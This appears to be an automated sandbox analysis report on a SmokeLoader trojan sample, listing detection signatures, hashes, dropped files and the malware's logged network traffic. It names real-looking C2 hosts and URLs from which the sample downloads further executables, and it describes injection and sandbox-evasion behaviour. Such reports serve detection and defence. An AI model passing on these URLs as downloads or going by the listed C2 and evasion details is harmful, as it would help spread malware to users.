Windows Analysis Report UZ6FEqlix4

Overview

General Information

Sample Name: UZ6FEqlix4 (renamed file extension from none to exe)
Analysis ID: 545931
MD5: 5e0ed8966761e70ee0b8dcd141aafb4c
SHA1: 933e68212d0f6d029e920bd93e5dca7ca5bdcb7a
SHA256: 8bbdda1786e15a568a573a2f38762e95de138af969e0a13b96d7086aaa98bfc2
Tags: 32, exe, SmokeLoader, trojan
Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection:

Found malware configuration
Source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
Multi AV Scanner detection for submitted file
Source: UZ6FEqlix4.exe Virustotal: Detection: 58%
Source: UZ6FEqlix4.exe Metadefender: Detection: 20%
Source: UZ6FEqlix4.exe ReversingLabs: Detection: 62%
Antivirus detection for URL or domain
Source: http://unicupload.top/install5.exe URL Reputation: Label: phishing
Source: http://privacytools-foryou-777.com/downloads/toolspab3.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: unicupload.top Virustotal: Detection: 15%
Source: host-data-coin-11.com Virustotal: Detection: 13%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\411F.exe Metadefender: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\411F.exe ReversingLabs: Detection: 67%
Source: C:\Users\user\AppData\Roaming\eveggtb Metadefender: Detection: 20%
Source: C:\Users\user\AppData\Roaming\eveggtb ReversingLabs: Detection: 67%
Machine Learning detection for sample
Source: UZ6FEqlix4.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\eveggtb Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\411F.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: UZ6FEqlix4.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA, 0_2_0041AA72

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: unicupload.top
Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe Domain query: infinity-cheats.com
Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://host-data-coin-11.com/
Source: Malware configuration extractor URLs: http://file-coin-host-12.com/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.233.81.115
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:02 GMTContent-Type: application/x-msdos-programContent-Length: 339456Connection: closeLast-Modified: Tue, 28 Dec 2021 12:56:02 GMTETag: W/"52e00-5d43457ecb7e9"Accept-Ranges: bytes
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yawyilmlp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oabgiwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwrkvn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oskoy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhvtxw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfdyfm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jealulibe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axnxlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgnuugce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kctmodtvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lspsrkslr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://clunuonr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pebbfc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkoocu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xpkuvjioi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxjfh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ithwflphmf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:55:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 28 Dec 2021 12:55:13 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a Data Ascii: 3eI:82O@e,YR9?RBpw0
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
Source: unknown DNS traffic detected: queries for: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: UZ6FEqlix4.exe, 00000000.00000002.674898642.000000000083A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Uses 32bit PE files
Source: UZ6FEqlix4.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402A5F 1_2_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402AB3 1_2_00402AB3
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402A5F 1_1_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402B2E 1_1_00402B2E
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402A5F 11_2_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402AB3 11_2_00402AB3
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402A5F 11_1_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402AB3 11_1_00402AB3
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: String function: 00426940 appears 133 times
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: String function: 00428320 appears 93 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00401962 Sleep,NtTerminateProcess, 1_2_00401962
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040196D Sleep,NtTerminateProcess, 1_2_0040196D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_00402000
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 1_2_0040250A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00401A0B NtTerminateProcess, 1_2_00401A0B
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_0040201A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_0040201E
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_0040202D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation, 1_2_00402084
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402491 NtOpenKey, 1_2_00402491
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_00402000
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 1_1_0040250A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_0040201A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_0040201E
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_0040202D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation, 1_1_00402084
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402491 NtOpenKey, 1_1_00402491
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00401962 Sleep,NtTerminateProcess, 11_2_00401962
